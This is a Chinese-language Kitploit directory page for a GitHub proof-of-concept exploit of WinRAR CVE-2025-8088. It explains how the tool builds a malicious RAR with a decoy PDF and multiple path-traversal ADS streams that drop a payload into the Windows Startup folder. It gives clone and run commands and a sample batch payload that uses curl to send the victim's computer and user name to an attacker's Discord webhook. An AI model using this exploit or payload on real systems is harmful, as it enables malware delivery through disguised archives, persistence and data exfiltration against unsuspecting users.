Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
best-CVE-2025-8088 — Winrar CVE 漏洞利用(版本 7.13 之前),通过单个文件中的多个 ADS 流实现(自定义 PDF 实现) | Kitploit
工具/GitHubGitHub/pentestfunctions/best-cve-2025-8088
漏洞分析漏洞利用后渗透利用渗透测试红队Payload 开发二进制利用
GitHubpentestfunctions/best-cve-2025-8088

best-CVE-2025-8088

Winrar CVE 漏洞利用(版本 7.13 之前),通过单个文件中的多个 ADS 流实现(自定义 PDF 实现)

查看仓库
1111个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-8088 WinRAR 漏洞利用 🔓

一个针对 WinRAR 漏洞(CVE-2025-8088)的概念验证利用程序,影响版本 7.12 及更低版本。该工具创建一个恶意 RAR 存档,通过路径遍历将有效载荷嵌入备用数据流(ADS),可能导致任意代码执行。

  • 其他许多工具存在的问题是它们不嵌入多个 ADS 流,需要要么有正确的路径遍历的运气,要么知道确切的用户名/解压目录。

🚀 工作原理

  1. 创建诱饵文档 📄 - 生成专业外观的 PDF(简历或渗透测试报告)
  2. 嵌入多个 ADS 流 🔄 - 以不同的路径遍历深度附加有效载荷流
  3. 操纵 RAR 标头 ⚙️ - 修改存档结构以利用路径遍历漏洞
  4. 将有效载荷写入启动文件夹 📂 - 解压时尝试将有效载荷写入 Windows 启动文件夹

🛠️ 使用方法

root@kitploit:~
# 克隆仓库
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# 安装依赖
pip install reportlab

# 运行利用程序
python CVE-2025-8088.py

✏️ 有效载荷自定义

编辑有效载荷以调用 Discord Webhook:

root@kitploit:~
# 替换脚本中的 PAYLOAD 变量:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"在 %COMPUTERNAME% 上被 %USERNAME% 提取\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

将 YOUR_DISCORD_WEBHOOK_URL 替换为你实际的 Webhook URL。

🔄 执行流程

  1. 受害者使用存在漏洞的 WinRAR(≤7.12)解压 RAR 文件
  2. 有效载荷被写入启动文件夹:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. 下次重启时 ➡️ 有效载荷自动执行

📋 要求

  • Windows 操作系统 🪟
  • Python 3.x 🐍
  • 已安装 WinRAR
  • ReportLab 库(pip install reportlab)
下载工具